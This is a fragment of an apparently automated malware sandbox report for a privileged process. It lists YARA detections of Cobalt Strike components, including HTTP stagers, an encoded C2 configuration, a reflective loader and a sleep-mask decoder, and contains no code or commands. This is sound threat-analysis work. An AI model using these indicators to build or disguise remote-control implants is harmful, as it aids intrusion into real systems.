              Imagebase: 0x7ff6b8550000
              File size: 69632 bytes
              MD5 hash: 73C519F050C20580F8A62C849D49215A
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, Author: Joe Security
              • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000005.00000002.641411926.00000243BEA20000.00000020.00000001.sdmp, Author: yara@s3c.za.net
              Reputation: high

              Disassembly

              Code Analysis
